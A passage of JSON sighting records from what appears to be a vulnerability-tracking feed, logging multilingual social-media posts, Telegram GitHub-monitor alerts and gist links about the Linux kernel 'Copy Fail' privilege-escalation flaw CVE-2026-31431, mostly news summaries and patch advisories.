"2026-05-04T14:00:04.000000Z"}, {"uuid": "c172485e-8af2-403d-8346-03fbbef94f36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XXwxQXb-tvoojVYSOrs5t4rzcGDASvn2l14g7pH1kZVhQSE", "content": "", "creation_timestamp": "2026-05-03T21:00:04.000000Z"}, {"uuid": "809b05cc-6339-45e6-aa89-b25566bea94f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/a3bc51ea1b488ff23e2733a1975eee72", "content": "", "creation_timestamp": "2026-05-04T15:10:04.000000Z"}, {"uuid": "1f66d444-509b-4289-b1dc-8b82df6a9111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkzzcresg222", "content": "Attackers are exploiting CVE-2026-31431, aka Copy Fail, a long-standing Linux kernel flaw allowing privilege escalation to root via in-memory cache modification of setuid-root binaries. #LinuxFlaw #KernelBug #USA", "creation_timestamp": "2026-05-04T15:45:22.616772Z"}, {"uuid": "3f28076e-51e1-4f78-a4ee-6ad773eccf50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/calimegai.bsky.social/post/3ml226lewgw2l", "content": "CISA ajoute la faille Linux CVE-2026-31431, exploit\u00e9e en local pour escalade de privil\u00e8ges, \u00e0 son catalogue KEV. Plusieurs distrib Linux sont concern\u00e9es. Restez vigilants ! \ud83d\udd12\ud83d\udc27 #CyberSecurity #calimeg ", "creation_timestamp": "2026-05-04T16:00:56.140940Z"}, {"uuid": "82891b10-80b1-46fd-8f30-bcf89327dac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml22hqye7k24", "content": "Urgent: 'Copy Fail' vulnerability (CVE-2026-31431) in Linux kernels since 2017 allows root access to unprivileged users. Patch immediately to secure your systems. #Linux #CyberSecurity #CVE202631431 Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-05-04T16:06:03.698001Z"}, {"uuid": "6b000c73-6277-430e-8c05-ea626527f7ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/dmc5179/701d2f649e64544e945a860a2ffca8ae", "content": "", "creation_timestamp": "2026-05-04T16:09:14.000000Z"}, {"uuid": "587b4912-9779-486a-840b-316697aa2271", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml24b52qkj2h", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T16:38:08.664879Z"}, {"uuid": "4521916e-10e8-4523-bd47-0c53827814f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml24k3kog62i", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T16:43:08.971763Z"}, {"uuid": "0c3a26c9-dfec-407c-8f6b-9ca2f5906ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml26o55c7o2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:21:12.685982Z"}, {"uuid": "451d4f93-a398-4e8f-9a7c-61d79065db20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml27a2umi72z", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:31:13.970667Z"}, {"uuid": "61d172de-9152-4663-8888-75931a3726d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3ml277e5neia2", "content": "\"CopyFail\" (CVE-2026-31431) : un utilisateur local sans privil\u00e8ge peut \u00e9crire 4 bytes contr\u00f4l\u00e9s dans le cache de TOUT fichier lisible \u27a1\ufe0f \u00e9l\u00e9vation root. Si vous avez du multi-tenant, des conteneurs, des CI runners non fiables : mettre \u00e0 jour. Ordinateur perso ? Moins urgent mais mettez \u00e0 jour [\u2026]", "creation_timestamp": "2026-05-04T17:32:11.752508Z"}, {"uuid": "c558d3b2-1439-4c8a-ad59-ab2a9999ef4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3ml277i4zi3m2", "content": "\"CopyFail\" (CVE-2026-31431) : un utilisateur local sans privil\u00e8ge peut \u00e9crire 4 bytes contr\u00f4l\u00e9s dans le cache de TOUT fichier lisible \u27a1\ufe0f \u00e9l\u00e9vation root.\n\nSi vous avez du multi-tenant, des conteneurs, des CI runners non fiables \u27a1\ufe0f mettre \u00e0 jour.\n\nOrdinateur perso \u27a1\ufe0f moins urgent mais mettez \u00e0 [\u2026]", "creation_timestamp": "2026-05-04T17:32:15.820758Z"}, {"uuid": "ba7d3283-c817-4087-946b-b5d3f7deb77b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hexonbot.bsky.social/post/3ml27cjm5l52p", "content": "AI found a 9-year Linux kernel bug in 1 hour. Copy Fail gives any local user root with a 732-byte Python script and can break container isolation. Patch now. https://www.hexon.bot/blog/copy-fail-cve-2026-31431-ai-discovered-linux-root #LinuxSecurity #AISecurity", "creation_timestamp": "2026-05-04T17:32:36.316016Z"}, {"uuid": "94ff514c-c208-48d2-82fb-db2bac5b1421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml27qwgm6qt2", "content": "\"Copy Fail\" Lands on CISA's KEV: A Nine-Year-Old Linux Bug Becomes a Patch Deadline On May 1, 2026, CISA added CVE-2026-31431, better known as \"Copy Fail,\" to its Known Exploite...\n\n#News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T17:40:52.930455Z"}, {"uuid": "2c4951da-595d-4029-a3cd-072c0a22736d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vritrasecnews.bsky.social/post/3ml2a6l4v5w27", "content": "CISA warns of the actively exploited \u201cCopy Fail\u201d Linux flaw (CVE-2026-31431), enabling root...\n\n\ud83d\udd17 https://www.tomshardware.com/software/linux/cisa-flags-actively-exploited-copy-fail-linux-kernel-flaw-enabling-root-takeover-across-major-distros-unpatched-systems-may-remain-vulnerable-to-attack", "creation_timestamp": "2026-05-04T17:48:17.317917Z"}, {"uuid": "cb49147f-b038-43da-859b-c1a90cb6ecdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82790", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a AdityaBhatt3010\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 15:55:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux Privilege Escalation | AF_ALG Crypto Abuse \u2192 Exploiting AEAD socket handling (CVE-2026-31431) to gain root via kernel-level manipulation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T16:00:05.000000Z"}, {"uuid": "60aa4e92-1d9e-431e-af4d-e0f11964d70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82795", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rippsec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 16:59:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nc v e\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T17:00:04.000000Z"}, {"uuid": "8d716eb6-f302-4140-877b-5f681e995106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mm-ilsoftware-bot.bsky.social/post/3ml2auoi22u2p", "content": "CVE-2026-31431: perch\u00e9 Linux Copy Fail preoccupa\nUna vulnerabilit\u00e0 nel kernel Linux, presente dal 2017, consente escalation a root manipolando la page cache. CISA e altri sogge...\nhttps://www.ilsoftware.it/vulnerabilita-linux-copy-fail-cve-2026-31431/", "creation_timestamp": "2026-05-04T18:00:39.649211Z"}, {"uuid": "bace5b3f-0c5d-4302-9a14-bce2686c43df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml25wryws52b", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:08:08.918120Z"}, {"uuid": "2e295ddc-ffb5-40cf-9391-cc3ba430afd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2d2d3idz2x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T18:39:35.987754Z"}, {"uuid": "fada86af-9d73-4c63-8e5b-1860df7f7c14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml26f6knaz2j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:16:11.771114Z"}, {"uuid": "53afef64-42d4-4998-afe9-7930b3bcdd9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2e4w4vwn22", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T18:58:56.973169Z"}, {"uuid": "b28347b4-7e44-42c9-9e8a-4bbc5d35c431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sebclick.bsky.social/post/3ml2e7lqlqc2z", "content": "Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux www.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-04T19:00:30.193234Z"}, {"uuid": "38b840b2-9cb5-42c7-872a-94f42c5ae298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml2gfw3csci2", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments A high-severity Linux vulnerability, \u201cCopy Fail\u201d (CVE-2026-31431), enables root privile...\n\n#Linux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T19:39:49.302500Z"}, {"uuid": "44a1b56e-b23f-4660-a722-6b42d6f48f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dietpi.com/post/3ml2j33d3wc2r", "content": "We gathered all info about how to mitigate the recently disclosed CVE-2026-31431 aka \"Copy Fail\" on #DietPi systems.\n\nPlease read through this, to assure your system is not vulnerable: github.com/MichaIng/Die...\n\nThe same applies to every other Linux system!\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-04T20:27:24.885816Z"}, {"uuid": "458a157b-9282-4ea8-b038-8a1606b108f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dietpi.com/post/3ml2j6tyr6222", "content": "We gathered all info about how to mitigate the recently disclosed CVE-2026-31431 aka \"Copy Fail\" on #DietPi systems.\n\nPlease read through this, to assure your system is not vulnerable: github.com/MichaIng/Die...\n\nThe same applies to every other Linux system!\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-04T20:29:30.832424Z"}, {"uuid": "fd0d860b-8e04-430b-b833-67155eb0986a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/byroniac.bsky.social/post/3ml2mulryyc2q", "content": "\"CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments\" www.microsoft.com/en-us/securi...", "creation_timestamp": "2026-05-04T21:35:23.455106Z"}, {"uuid": "ffec2d95-fb83-4121-a6a0-ba183394cf5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/philbraun.org/post/3ml2ngwlppc22", "content": "April 8, 2026 - France's Interministerial Directorate for Digital Affairs Switched from Microsoft to Linux\nApril 29, 2026 - CVE-2026-31431 bug is disclosed with capability to get root access on nearly every major Linux distro\nMay 20, 2026 - Bill Gates Buys France to Stop Economic Collapse\n#copyfail", "creation_timestamp": "2026-05-04T21:45:38.113179Z"}, {"uuid": "1c454b11-5a33-4025-adf8-fdb4fb7912cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "Cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mineabot.xyz/post/3ml2oat3m3g25", "content": "Cve-2026-31431, dubbed Copy Fail, is drawing attention from the selfhosted community. Worth a closer look for teams relying on clipboard-based workflows or any tooling where copy operations cross trust boundaries. Patch management discipline matters here.\n\n#devops #cloud #k8s", "creation_timestamp": "2026-05-04T22:00:05.730271Z"}, {"uuid": "6d88a1e2-6328-4766-98ca-3711e572fad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jcastanedacano.bsky.social/post/3ml2oc5iwhx2t", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments", "creation_timestamp": "2026-05-04T22:00:49.674428Z"}, {"uuid": "126054d7-adab-4769-a87d-2400490e2a49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linuxbp.bsky.social/post/3ml2pb4a44c2j", "content": "Vulnerabilidad cr\u00edtica en Linux \ud83d\udea8 Copy Fail (CVE-2026-31431) permite escalar a root desde un usuario sin privilegios. Silenciosa, potente y presente desde 2017. Actualizar el kernel es clave para protegerte. #Linux #Ciberseguridad #Kernel Mas info en mi blog", "creation_timestamp": "2026-05-04T22:18:08.903462Z"}, {"uuid": "03c7ed3f-4d7e-4943-a9b5-3440f1e8098b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/d40a1dc8ac4ee266441c61907c67812d", "content": "", "creation_timestamp": "2026-05-04T22:32:09.000000Z"}, {"uuid": "645888fa-5c6b-48f8-a3a4-303361423f4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/humanghostemoji.bsky.social/post/3ml2sg3y6vy23", "content": "US warns CopyFail bug (CVE-2026-31431) hits Linux 7.0 & earlier, exploited in the wild. Patch by May 15. #Linux #security\ntechcrunch.com/2026/05/04/u...", "creation_timestamp": "2026-05-04T23:14:37.784190Z"}, {"uuid": "a157e6ba-5489-4a09-90aa-27b2bf8362e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2swnj7rl2x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T23:23:52.853138Z"}, {"uuid": "38faa0b7-3794-4921-b183-d809f8618ea8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82814", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a KhaosFarbauti\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 21:54:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC for CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T22:00:04.000000Z"}, {"uuid": "9d73794b-aff0-4fc6-a234-69c65240594b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml2rmqclgb2t", "content": "Active exploitation targets include cPanel flaw CVE-2026-41940 allowing authentication bypass, Linux Copy Fail CVE-2026-31431, and ongoing supply-chain attacks by TeamPCP impacting CI/CD and SaaS environments. #LinuxKernel #SupplyChain #USA", "creation_timestamp": "2026-05-04T23:00:27.076966Z"}, {"uuid": "b92aa46a-d94b-4a4b-bf20-dbac08b9029d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82820", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a check-copyfail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Silent4Labs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 22:50:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only Linux Bash script to assess host exposure to CVE-2026-31431 (Copy Fail).\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T23:00:05.000000Z"}, {"uuid": "ef150ce2-e667-4c8e-b705-9196bd158c8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Sagreras/8b433fc36ef0b27726c0ff435a8a5638", "content": "", "creation_timestamp": "2026-05-04T20:11:04.000000Z"}, {"uuid": "77296a00-8fbd-47e3-8c82-9d6fd4fe72c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3ml36pwp3cc2g", "content": "The latest update for #Tanium includes \"What is a software patch? How it works and why it matters\" and \"Copy Fail (CVE-2026-31431): What #Linux administrators need to know now\".\n \n#cybersecurity #EndpointProtection #EndpointSecurity https://opsmtrs.com/3DH5Ks9", "creation_timestamp": "2026-05-05T02:54:52.229959Z"}, {"uuid": "7b233e77-1920-4aab-a087-a187e4f75080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rankednews.bsky.social/post/3ml2v4ownap23", "content": "U.S. government warns of severe CopyFail bug affecting major versions of Linux: The U.S. government has issued an urgent warning regarding \"CopyFail,\" a severe security vulnerability tracked as CVE-2026-31431 affecting Linux kernel versions 7.0 and earlier. Discovered\u2026 https://ranked.news/763195?u=b", "creation_timestamp": "2026-05-05T00:03:03.956033Z"}, {"uuid": "ef9cb3b7-5698-45cd-b125-3cb72ca7e9ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3ml3bwahx642o", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\nDiscussion", "creation_timestamp": "2026-05-05T03:52:06.371029Z"}, {"uuid": "83a33e6b-9adb-4bdb-a74b-ba62bc2d0163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetespana.bsky.social/post/3ml2zbestff2c", "content": "La vulnerabilidad CVE-2026-31431 afecta a la mayor\u00eda de distribuciones Linux modernas y ya est\u00e1 siendo explotada activamente. CERT-EU exige actuaciones inmediatas en operadores y administraciones.", "creation_timestamp": "2026-05-05T01:17:15.599393Z"}, {"uuid": "e7656cfb-a0b6-49eb-8610-4a7b2732e48e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetde.bsky.social/post/3ml2zbky4qb2v", "content": "CVE-2026-31431 betrifft nahezu alle g\u00e4ngigen Linux-Distributionen seit 2017 \u2013 Patches sind verf\u00fcgbar, aber noch nicht \u00fcberall eingespielt.", "creation_timestamp": "2026-05-05T01:17:22.844627Z"}, {"uuid": "1d728967-1f30-4a74-b10e-5344cfa6b31d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetfr.bsky.social/post/3ml2zcadfnt2f", "content": "La vuln\u00e9rabilit\u00e9 CVE-2026-31431, activement exploit\u00e9e depuis fin avril, touche Ubuntu, RHEL, Amazon Linux et les environnements Kubernetes. Les op\u00e9rateurs cloud et h\u00e9bergeurs fran\u00e7ais doivent agir sans d\u00e9lai.", "creation_timestamp": "2026-05-05T01:17:44.422371Z"}, {"uuid": "555482ca-a451-4862-bf78-eee25510272e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3ml2zokdr2d2j", "content": "Critical Linux Kernel \u201cCopy Fail\u201d Flaw Sparks Global Root Access Panic Across Major\u00a0Distros\n\nIntroduction: A Silent Kernel-Level Weakness With Explosive Consequences A newly identified Linux kernel vulnerability, tracked as CVE-2026-31431 and nicknamed \u201cCopy Fail,\u201d has triggered serious concern\u2026", "creation_timestamp": "2026-05-05T01:24:38.141087Z"}, {"uuid": "0580e394-2dbb-4995-aec7-06e2515d1ab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/novalfaiq/e6afa58d88747d77a302b80aa86088b2", "content": "", "creation_timestamp": "2026-05-05T01:23:45.000000Z"}, {"uuid": "ba15ab61-677e-40cf-88a3-d17d8c8833e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3ml3izdlt4c2w", "content": "CVE-2026-31431: Copy Fail vs. rootless  www.dragonsreach.it/2026/05/04/c...", "creation_timestamp": "2026-05-05T05:59:06.105115Z"}, {"uuid": "50399b73-3349-46b0-a8cf-c32c19615025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 